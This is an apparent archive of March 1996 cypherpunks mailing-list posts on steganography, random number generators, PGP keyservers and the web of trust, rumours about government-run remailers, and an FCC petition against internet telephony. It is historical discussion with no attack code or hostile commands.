If the religious right doesn't succeed in pushing FCC Net-regulation
with the cyberporn excuse, the long-distance giants will succeed by
whining about I-Phone.

I am starting to think that FCC regulation of the Internet is almost
inevitable. With net-phone projects like Free World Dialup being covered
in the New York Times, it may just be a matter of time.

-Declan

---------- Forwarded message begins here ----------

FCC PETITIONED TO STOP MISUSE OF THE INTERNET!

WASHINGTON, March 4 /PRNewswire/ -- The America's Carriers
Telecommunication Association (ACTA), a trade association of
competitive, long distance carriers today petitioned the Federal
Communications Commission (FCC) to stop companies from selling
software and hardware products that enable use of the Internet to
voice long distance services.

    A growing number of companies are selling software programs with
ancillary hardware options that enable a computer to transmit voice
conversations.  This, in fact, creates the ability to "by-pass" local,
long distance and international carriers and allows for calls to be
made for virtually "no cost."  For example, on-line service providers
generally charge users around $10.00 for five hours of access and then
around $3.00 for each additional hour.  Five hours equals 300 minutes,
divided by $10 is 3.3 cents per minute.  The average residential long
distance telephone call costs about 22 cents per minute or seven times
as much.

    The Internet is a unique form of wire communications. The rapid
growth of the Internet is stressing the capacities of the Internet
itself. The Internet access points are growing at 50% per month with
subscriber growth running close to 30% per month.  Individuals are
accessing the Internet for more and more business applications such as
market research, news, and advertising with corporate web sites
exploding, to say nothing about using the Internet for E- mail
applications.

    ACTA submits that it is incumbent upon the FCC to exercise
jurisdiction over the use of the Internet for unregulated interstate
and international telecommunications services.  Long distance and
international carriers must be approved by the FCC to operate and must
file tariffs before both the FCC and state public service commissions.
All of these requirements are stipulated in the Communications Act of
1934 and the Telecommunications Act of 1996.

    Technology may once again be surpassing government's ability to
control its proper use.  However, the misuse of the Internet as away
to "by-pass" the traditional means of obtaining long distance service
could result in a significant reduction of the Internet's ability to
transport its ever enlarging amount of data traffic. Therefore, ACTA
has petitioned the FCC to define the type of permissible
communications which may be effected over the Internet.

    America's Carriers Telecommunication Association was founded in
1985 by independent long distance companies to serve the needs of
small businesses and to advance the goals of more effective
competition. ACTA's membership today includes over 130 companies
engaged in providing telecommunications services.


CONTACT:  Charles H. Helein, general counsel, 703-714-1301, or Jennifer Durst-
Jarrell, executive director, 407-332-9382, both of America's Carriers
Telecommunication Association








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Wed, 6 Mar 1996 16:59:38 +0800
To: cypherpunks@toad.com
Subject: Steganography idea: CU-SeeMe
In-Reply-To: <9603041921.AA08825@bilbo.suite.com>
Message-ID: <199603060734.AAA00178@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


The thing that bothers me about existing steganography code I've seen
is that it all uses uncommon communication channels to hide data. For
instance, the "hide data in a picture" programs: useful, up to a
point, but how often do I send pictures to other people? I think to be
effective, methods need to be employed that exploit existing, well
used communication channels.

So here's one idea I've had as a place to hide a channel: network
video, in particular CU-SeeMe video streams. CU-SeeMe is a lowtech
network video application, people running Windows and Macs with a $99
camera and a PPP stack can send about 2fps (160x120) to each other
over the Internet. Times I've used it, bandwidth is about 8kbits/sec
(I'm on a modem).

So here we have a reasonably high bandwidth channel, person to person,
that is already being used a lot on the net. How easy would it be to
borrow a few bits to hide the secret message? Because the image
quality is low (4bpp or 6bpp grey), and definitely nonrandom, you'd
need to be more subtle than just borrowing the low bit.

I think the answer could be found in image processing algorithms.
Spreading a bit out across various pixels would nice, as would some
sort of adaptive algorithm that identifies part of the image that's
safe to hide data in. It's not good enough that the image with hidden
data looks the same to the eye: it has to be statistically identical
to undoctored streams.

The biggest barrier to this I see is that the CU-SeeMe protocol itself
is proprietary, and the only existing free code I know of that does it
doesn't work very well (version 3.0 of a Unix reflector: buggy, now
very old). Of course you have to emulate the normal software 100%
correctly, or the Men in Black will see you're using stego tools.


I should remark that the subliminal channel stuff in digital
signatures is a really beautiful example of steganography.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 6 Mar 1996 15:29:59 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: WARES - random generator
In-Reply-To: <2.2.32.19960305231417.009380a8@mail.teleport.com>
Message-ID: <199603060554.AAA15842@homeport.org>
MIME-Version: 1.0
Content-Type: text


I'd be interested in seeing design reviews & the like.  A $50 hardware
rng that did a recent job would be fabulous, but rngs are notoriously
easy to mess up.  So can we get design information & such?

Adam


| >Keywords: madison hawai obsceni prising ridblood ribiliss 
| >Subject: WARES - random generator
| >Reply-To: email@fringeware.com (FringeWare Inc)
| >Date: Tue, 5 Mar 1996 11:06:20 -0600
| >Apparently-To: fwlist-daily@fringeware.com
| >X-UIDL: 4751f2738fffe6a83cf40be20fcd79a5

| >The product line is called Perfect Crypt Products and the new item
| >being considered is a random number generator which plugs into the
| >serial port of your PC/Mac/Sparcbook/Cray/etc., and pours out a stream
| >of random numbers. The process is based on thermal radiation, the 
| >randomness looks quite good, and the product would retail for about us$50.
| >
| >If you have an interest in such a product, please let us know here
| >at: email@fringeware.com  and we'll add it to our catalog.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Wed, 6 Mar 1996 17:20:34 +0800
To: cypherpunks@toad.com
Subject: Re: PGP 3.0/4.0
In-Reply-To: <199603030054.QAA28612@ix7.ix.netcom.com>
Message-ID: <199603060755.AAA00215@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>the last time I put together a 6,000 key ring on a 386 it took three
>days & several Mb.

The MIT PGP keyserver now has new non-PGP based code to manage it's
keyring of 20,000+ keys. Not sure if you can get the code, or how easy
it'd be to adapt to a deployed usage, but presumably it's much more
efficient.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <bstrawse@copper.ucs.indiana.edu>
Date: Wed, 6 Mar 1996 17:11:49 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA
In-Reply-To: <ad62728b1a0210049ce9@[205.199.118.202]>
Message-ID: <199603060750.CAA17490@copper.ucs.indiana.edu>
MIME-Version: 1.0
Content-Type: text/plain


> No felon may own a gun legally in California, for some period of time after
> conviction. I presume similar laws apply in other states. (Of course, a lot

No felon may legally own a gun anywhere.

Federal Firearms laws specifically prohibit any person convicted of a 
crime for which they may receive a sentence of more than one year from 
possessing a firearm for the rest of their lives

Bryan




-- 
= Bryan Strawser / Indiana University / bstrawse@indiana.edu =  
= Live Free or Die / http://copper.ucs.indiana.edu/~bstrawse =   
=  Gondolin Technologies / http://www.gondolin.org/gondolin  =    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 6 Mar 1996 21:41:41 +0800
To: nelson@santafe.edu (Nelson Minar)
Subject: Re: PGP 3.0/4.0
In-Reply-To: <199603060755.AAA00215@nelson.santafe.edu>
Message-ID: <199603061313.IAA07336@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >the last time I put together a 6,000 key ring on a 386 it took three
> >days & several Mb.
> 
> The MIT PGP keyserver now has new non-PGP based code to manage it's
> keyring of 20,000+ keys. Not sure if you can get the code, or how easy
> it'd be to adapt to a deployed usage, but presumably it's much more
> efficient.

How about code that goes out & fetches keys upon demand, al-la DNS?

[1st pass thinking is there are too many holes in such a method, even
if MIT's server could handle the real-time load...]



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Wed, 6 Mar 1996 22:14:28 +0800
To: cypherpunks@toad.com
Subject: Re: SEAL cipher info requested (something actually list related!)
Message-ID: <199603061331.IAA12263@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Christopher Allen wrote:
> What I am seeking is more than what is in the book:
> 
>   * are there are any links on the web to SEAL?

I tried skimming the web and found little relevant info.

[..]
>   * has anyone currently licensed it?

I have heard through the grapevine that Richard Mark's version of 
UUENCODE implements SEAL.

>   * should we be (the community) be looking at SEAL
>     for standards (say as an alternative to RC4?)?

RC4 is not patented, and AFAIK RSA is not actively seeking royalties etc. 
for using it. SEAL is patented/patent pending.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMT2TwioZzwIn1bdtAQEWnwF/arOP9WA0xMEFNtrPMUt4eTlUPzxRmTnf
qbfvyvd9Kd2H9BG4dNF1lgzVFLfj6GnI
=nzCA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 10 Mar 1996 13:58:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP to PC mail integration
In-Reply-To: <199603010652.WAA00782@cryptical.adnetsol.com>
Message-ID: <199603011533.KAA11422@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle writes:
> Exactly. Yes, it will at least have to have a config screen. It will
> probably have to prompt for a passphrase on the fly, unless you want to
> store it. It can ask to encrypt or not, or it can have a header in the
> message. The important thing is I don't care about the user interface
> of the mail program. This has been the big barrier so far.

In spite of my previous grouchiness on this issue, I like the idea and I
think it's worth pursuing.

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Gurski <mgursk1@gl.umbc.edu>
Date: Sun, 10 Mar 1996 14:32:31 +0800
To: cypherpunks@toad.com
Subject: Re: Chaff in the Channel (Stealth PGP work)
In-Reply-To: <199603010418.VAA02087@nelson.santafe.edu>
Message-ID: <Pine.SGI.3.91.960301151341.7556A-100000@umbc10.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Feb 1996, Nelson Minar wrote:

> As noble as "flood the detection channels" sounds, has it really ever
> succeeded? Do people who don't care about privacy day to day ever go
> through extra trouble to make other people's privacy easier? I can
> think of two public efforts to increase noise that have failed:
> putting Spook keywords in all Usenet posts, and using PGP email for
> normal day to day traffic. The failure of the second channel-flooding
> is especially notable: even people doing serious crypto hacking, with
> well established public keys, don't seem to PGP encrypt normal day to
> day traffic. It's just not convenient enough.

At one point I'd thought about setting up a "random" crontab on my
local machine to send out encrypted junk to remailers over the net via
a SLiRP connection.  It made a little more sense when I was connected
24/7.  I'm still planning on doing this sometime, probably during
Spring Break or this summer.  I don't know how useful it would be,
though.


--
|\/|ike Gurski  mgursk1@gl.umbc.edu  http://www.gl.umbc.edu/~mgursk1/
finger or mail subject "send pgpkey" or "send index"  Hail Eris!  |Member,
1024/39B5BADD PGP Keyprint=3493 A994 B159 48B7 1757 1E4E 6256 4570|   Team
My opinions are mine alone, even if you should be sharing them.   |   OS/2





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 10 Mar 1996 01:38:28 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: key cert. distrib. and management (Was: A brief comparison of email encryption protocols)
In-Reply-To: <199603011603.IAA16596@slack.lne.com>
Message-ID: <199603012228.RAA21541@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I've changed the Subject: because this now has very little to do with
email encryption protocols]

Eric Murray writes:
> Finally, a question:  should the keyserver be able to serve
> keys in a way that is secure from a MITM attack, or can it depend
> on the certificate chain in the key certificate itself to
> validate the key certificate?  I think it can, but I am not
> sure, 

The certificate should be able to stand on its own. Anyone can already feed
arbitrary certificate data to you via the keyserver, just by submitting it to
the keyserver in the usual way. 

However, a MITM can mount some denial-of-service
attacks by removing sigs. from a cert., or substituting some certs. for
others, or stopping the delivery of some certs. If the keyserver signs
responses by default, then an ordinary active attacker (non-MITM) couldn't
do DoS at finer granularity than the scope of each signed piece.

> so perhaps someone smarter than I can explain why, or why not.

Disclaimer: My decision to reply to your message should in no way be 
construed as implying a judgment on my part about our relative intelligence :)

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Sun, 10 Mar 1996 13:41:41 +0800
Subject: No Subject
Message-ID: <QQaffm00970.199603020041@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Jonathon Fletcher writes:
>   Can anyone tell me anything about a product called "Entrust", by Nortel
> (Northern Telecom). The notes talk about the software using DES ("which
> employs a 56-bit key") so I guess it's single DES, not triple DES. It also
> mentions a proprietary algorithm called CAST. 
> 
>   Is this worthy of further investigation, or is it suspect ? What is 
> CAST, and would it be classed as snake oil ?

"Entrust" was built by Smart People. Of course, any given component of
it is only as strong as the underlying algorithms; you yourself are
probably aware of the problems associated with DES vs 3DES and such. I
would suggest examining the documents.

I don't know anything about CAST.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 10 Mar 1996 01:37:06 +0800
To: perry@piermont.com
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199602292139.QAA18366@toxicwaste.media.mit.edu>
Message-ID: <199603012035.WAA12723@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> > Now, consider adding a URL to every signature.  Lets even use your
> > URL, which is 35 characters long (and lets not even count the NULL or
> > length byte).  Adding this URL to 30000 signatures would add 1050000
> > bytes, or just over 1MB.  This is an increase in 12% of the keyrings!
> 
> Yes, but we have to assume that the need for central key servers would
> go away if we had a way of distributing the data around, which would
> reduce the problem substantially...
> 
> > On the other hand, using my method and your "URL" (clark.net) would
> > add only 10 bytes per sig, or 300k.  This is only a 4% increase.

The current PGP keyring model does not scale anyway.  Suppose one day
every user on the Internet will have a key...  It is not relevant
whether the space per key is 100 bytes, 1000 bytes, or 10000 bytes.
All of these sizes are small enough for it to be quick to transfer a
single key.  There will soon be no way to transfer and store the
entire key ring.  In the long run, the problem must be solved using an
entirely different, distributed architecture.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Fri, 8 Mar 1996 07:22:23 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603032316.SAA22404@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mark Allyn 206-860-9454 wrote:
[..]
> Take a piece of non conducting board, say about six by six
> feet. Put electrodes on it; say a pair of electrodes every
> quarter inch or so across and down.
> 
> Each pair of electrodes would be connected to logic so that
> it generates a unique number. When the electrodes are shorted,
> the number would be generated.

Quite elaborate. And unless you live in a rainy part of the world, not 
very useful.

Better off using those contraptions where little steel balls fall around
the electrodes.  There's some entropy there... but still, it's too 
elaborate for RNG generation.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTooTyoZzwIn1bdtAQFXIwF/cjzvAfNJMOn9Pw6VSztPKCHUc/dmuwZ1
bOAEKnlQmwhRKOxpNmBr+EpM3zoRIWWP
=8nb+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 8 Mar 1996 07:22:42 +0800
To: cypherpunks@toad.com
Subject: DoubleSpeak
Message-ID: <960303190109.2020177f@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


> In addition they
>mentioned that the NSA has successfully developed systems to break
>encrypted messages below 1000 bit of key length and strongly suggested
>to use at least 1024 bit keys. They said that they semselves use 1024
>bit keys.

Is there anyone her who has *not* "developed systems to break encrypted
messages" ? One is called brute force and can run on any PC. The two 
pieces missing from the statement is the *cost* and *time* involved
in breaking keys of X length & would suspect the algorithm might have
something to do with the answer. (Can generate a LOASDR key of 1024 bits
real easily, breaks just as fast).

I use a PGP key of 1024 bits simply because I am too lazy to go to 2048
so why was this turkey posted twice ? Lacking meaningful parameters, it
does not really say anything.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Mar 1996 01:53:12 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: book idea: info terrorism/espionage etc.
In-Reply-To: <199603040045.QAA24345@netcom5.netcom.com>
Message-ID: <Pine.SUN.3.91.960303230605.23464C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Vladimir Z. Nuri wrote:

[...]

> I was just thinking what an interesting book this could be. if
> it doesn't cover the ideas of "information terrorism" that are
> hinted in e.g. Strassman's remailer paper, it seems this is a 
> vacuum that could be filled with a very significant/interesting
> tome by someone.

Been addressed.  See e.g., Winn Schwartau, "Defense in Depth for 
Information Systems Survival"  8 International Journal of Intelligence and 
Counterintelligence 2, 229.

Mr. Schwartau is the Exec. director of Inter.Pact, Inc., a Florida 
information security firm and has written what is considered, in some 
circles, the seminal work on the subject "Informational Warfare: Chaos 
on the Electronic Superhighway.

[..]

> I've seen a lot of editorials on reforming the spook apparatus,
> and it seems now is the prime moment for some very influential books
> to come out to influence future policy ideas.

Apparently you're not as well read as you think, Lance.  :)

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Mar 1996 06:47:12 +0800
To: Just Rich <rich@c2.org>
Subject: Re: Remailers run by spooks
In-Reply-To: <199603040511.AAA24235@bb.hks.net>
Message-ID: <Pine.SUN.3.91.960304003859.23464J-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Mar 1996, Just Rich wrote:

> -----BEGIN PGP SIGNED MESSAGE-----

> I have no doubt that the CIA can break 1000-bit keys on a case-by-case
> basis, *if they decide to allocate the resources*. I think it's possible
> that some remailers are run by spooks. However, I seriously doubt that
> anyone is breaking stuff routinely, and I think the web of trust is pretty
> good.


What does the web of trust currently have to say about the political 
reliability of remailers?


> However, I also have no doubt that Strassmann and Marlow are spreading
> disinformation and exaggerating their capabilities in an attempt to break
> the web of trust and incite a witch hunt. It won't work. The answer in any
> case is more use of remailers, not less. Just turn up the noise level. 
> You already know that nothing is 100% secure, but you do what you can. 
> It's a war of attrition.

And thus the winner will be the one who makes it the hardest for the 
other to fight, not who inflicts the most casualities.

> 
> - -rich
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBMTp7ayoZzwIn1bdtAQFJXgGAg8I4+IwZYrDI46bMj2nED+Dh0AeoMJVs
> PP10Ui5u46sXDAUjpMzJSwv5EqdIOEKy
> =611k
> -----END PGP SIGNATURE-----
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 8 Mar 1996 01:53:23 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603040440.FAA28574@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


(Lots of stuff deleted)

>I attended last weeks "Information, National Policies, and International
>Infrastructure" Symposium at Harvard Law School, organized by the Global
>Information Infrastructure Commission, the Kennedy School and the
>Institute for Information Technology Law & Policy of Harvard Law School.

>During the presentation by Paul Strassmann, National Defense University
>and William Marlow, Science Applications International Corporation,
>entitled "Anonymous Remailers as Risk-Free International Infoterrorists"
>the questions was raised from audience (Professor Chaarles Nesson,
>Harvard LAw School) - in a rather extended debate - whether the CIA and
>similar government agencies are involved in running anonymous remailers
>as this would be a perfect target to scan possibly illegal messages.

>Both presenters explicitly acknowledged that a number of anonymous
>remnailers in the US are run by government agencies scanning traffic.
>Marlow said that the government runs at least a dozen remailers and that
>the most popular remailers in France and Germany are run by the
>respective government agencies in these countries. In addition they
>mentioned that the NSA has successfully developed systems to break
>encrypted messages below 1000 bit of key length and strongly suggested
>to use at least 1024 bit keys. They said that they semselves use 1024
>bit keys.

>I ask Marlos afterwards if these comments were off or on record, he
>paused then said that he can be quoted.

>So I thought I pass that on. It seems interesting enough, don't you
>think?

(more stuff deleted)

     I don't know about everyone else, but I consider this, if true, to be a 
MAJOR worry.  It never ceases to amaze me how lightly the government takes 
lying to the people.  Unfortunately I don't have the contacts or resources 
to do any further investigation, I hope this thread is resolved one way or 
another soon.

nobody@unimportant




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fernando Pinho <fpinho@dglnet.com.br>
Date: Thu, 7 Mar 1996 02:02:16 +0800
To: cypherpunks@toad.com
Subject: <none specified>
Message-ID: <199603041301.IAA25608@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTrprCoZzwIn1bdtAQFhzgF/d++LdphH36YJGKYP3PXDMo3qlpUrzMi+
NgzW6ZPcmCIqk1GLupjWsEx2hE7GfgXo
=HekL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: infsuphw@ix.netcom.com (Jack Vonderheide )
Date: Fri, 8 Mar 1996 19:58:42 +0800
To: private-eye@netcom.com
Subject: Who is DCS? (was "Finding Married Women}
Message-ID: <199603041640.IAA11672@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This is in response to the many e-mails I have received on this 
subject:

1.  I am a consultant that works with major banks in the fraud 
prevention and due diligence areas.

2.  I have no connection whatsoever with DCS or any member of its 
management.

3.  Last week (2/26) I made a personal visit to DCS' offices near 
Dallas for the purpose of learning more about their offerings.

4.  VERY BRIEFLY, DCS has assembled a database with in excess of 200 
million records.  The database is searchable by any criteria or 
combination of criteria.  As an example, if you wanted to know all 
Janes that were born on 03/01/42, you can simply ask the system for 
that information and you get it.  If you wanted to know everyone with 
the last name Williams that lives in zip code 90210, same deal.

5.  There is a wide variety of information available, including full 
DOB, physical description, SSN, address, phone number.

6.  What I found particularly attractive about this service is the 
pricing scheme.  There is a one-time charge of $195 to establish an 
account.  Thereafter, you only pay for what you access.  A nationwide 
search is $5.00 and returns up to 100 matches.  If you want a full 
report on one of the "hits" that will return everything but credit 
header information, it costs an additional $4.00.  Credit header 
information costs another $6.00.  So, for $15.00, you get everything 
without paying any monthly fees or "time online" charges.  However, if 
none of the "hits" look promising, you've only spent $5.00.

7.  DCS can be reached at 800-299-3647 or 214-422-3600.  Contact's name 
is Andy.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 9 Mar 1996 05:57:13 +0800
To: cypherpunks@toad.com
Subject: Re: Web of Trust vs other models
Message-ID: <199603041818.KAA27672@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Bill Stewart <stewarts@ix.netcom.com>
> 
> Meanwhile, Don Kitchen at one point collected all the data off the
> MIT keyserver for analysis, which is a much different problem than
> random signatures.  I found that the chain from some middle point,
> such as Phil Zimmermann's or Derek Atkins's key was about 12-14 levels
> deep, averaging about 6, which compares interestingly with the
> default PGP depth limit of4.  From my key, it was pretty deep,
> especially since my certification from Phil Karn was from one of
> his older keys, which is why I asked Derek to sign my key...

Let's not forget that the web of trust only works if you personally
know and trust the next-to-last person in the chain (the one who signed
the key you are interested in).  Chain length doesn't matter if you've
never heard of the last signer.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Sat, 9 Mar 1996 20:00:32 +0800
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: Looking for code to run an encrypted mailing list
Message-ID: <116B1A04ADE@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


- > I'd like to run an encrypted mailing list

contact colossus@colossus.net they've already hacked majordomo to do 
this. please mention gpowers@meaning.com sent you.

yes, this is an ad. but, two people have already asked and i figured 
there might be more.

glenn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 04:30:52 +0800
To: cypherpunks@toad.com
Subject: Re: art-stego
Message-ID: <ad60a0450702100410e8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is a very good idea. I wish I'd thought of it.

Just bear in mind that this form of steganography is getting further away
from conventional hiding, and into "pure plausible deniability." In fact,
one need not even make a serious attempt to hide the encrypted bits: just
call the encrypted file "art" and be done with it! (I'm not saying stego is
worthless, just that there's a slippery slope one can get on, with one
extreme being this fiction that "this is not an encrypted file, this is
_art_!")

At 7:18 PM 3/4/96, Jim Miller wrote:
>The recent discussion "Chaff in the Channel" got me thinking about an
>alternative to hiding random bit streams in picture files.  The goal of
>steganography, as I see it, is to provide plausible deniability.  The

Yes, all those critics who point out that steganography (not to mention
stenography) is an example of the rightly-maligned "security through
obscurity" are missing this point, that steganography arises in situations
where the mere act of communicating is itself actionable. (Get caught in
Berlin during the war with invisible ink or microdots and get hanged the
next morning, whether or not the SS can read the traffic.)

>problem with hiding bit streams is that you can never be sure if the
>opponent has developed an analysis technique to prove a particular file
>contains a suspicious bit pattern.

Yes, this is why I suggested (some years back, originally) that noise be
deliberately added to even images not intended for communication, as
"chaff" to confuse traffic analysts.

Your approach is a better one, as the "art stego" market, while small,
could be self-sustaining.


>The alternative to hiding bit streams is to not hide them.  Use them to
>generate pretty pictures.  For example, modify a fractal image generator
>to accept a bit stream as input.  Use the bit settings to influence the
>values used to iterate the fractal function.  You don't have to use
>fractals, any function that produces pretty pictures would probably work
>as long as there was a way to extract the bit stream from the final
>picture.  Brute force would probably work fast enough for humans.
>
>One possibility is a screen saver that produces an "infinite" variety of
>pretty pictures by generating a pseudo-random bit stream and using it to
>help generate the next background picture.  Occasionally, the picture
>might be so cool you will want to send it your friends or post it on the
>Net or just keep it around to look at.
>
>The goal is to create an innocent reason for passing around unique images
>that contain random bit streams so we don't have to worry if somebody
>finds the bit stream.  If you live in a country that doesn't outlaw
>abstract art you have plausible deniability.

Now it's just up to someone to implement this. I don't expect this to be a
huge market--remember what's happened to all those Mandelbrot images that
were once the rage--but there's a chance it will get established as one of
those "cool" apps that are tres trendy for a while.

I still would expect that when the Hamas leaders in Gaza are picked up for
questioning and "ArtStego" is found on their systems, along with various
"abstract artworks" on their disk drives, that Mossad will not be fooled.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 10 Mar 1996 14:27:53 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603042219.OAA16557@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 1 Mar 1996 10:26:14 -0800 (PST)
Errors-To: gklein@willamette.edu
Reply-To: cda96-l@willamette.edu
Originator: cda96-l@willamette.edu
Sender: cda96-l@willamette.edu
Precedence: bulk
From: Peter Saint James <peterstj@ix.netcom.com>
To: Multiple recipients of list <cda96-l@willamette.edu>
Subject: Fwd: Freedom to Read Week (CA) and "Black Thursday" WWW page
X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas


This appeared on another list I'm on.  Besides giving you a view of a (bad)
future, it is an example of an HTTP proxy which could also be used for
anonymous browsing.  -  Bill



>          ELECTRONIC FRONTIER CANADA (EFC) --- PRESS RELEASE
>
>(For immediate release --- February 27, 1996)
>
>
>                "Freedom to Read" in Cyberspace
>
>        A few members of Electronic Frontier Canada have
>        developed an amusing and interactive Web page
>        to celebrate 'Freedom to Read Week'.
>
>The Internet, some people say, is out of control and in need
>of strict government regulation.  But just what might a censored
>Internet look like?
>
>One possible answer to that question is given by the "Black Thursday Machine",
>an interactive Web page that was the brainchild of three multimedia designers:
>Brian Hall, Andrew Chak, and Rob Stanley.  Stanley is also a member of the
>online civil-liberties organization Electronic Frontier Canada.
>
>"Black Thursday Machine" Web pages:     http://www.vex.net/~brian/Censored
>                                        http://www.hyperactive.net/censored
>
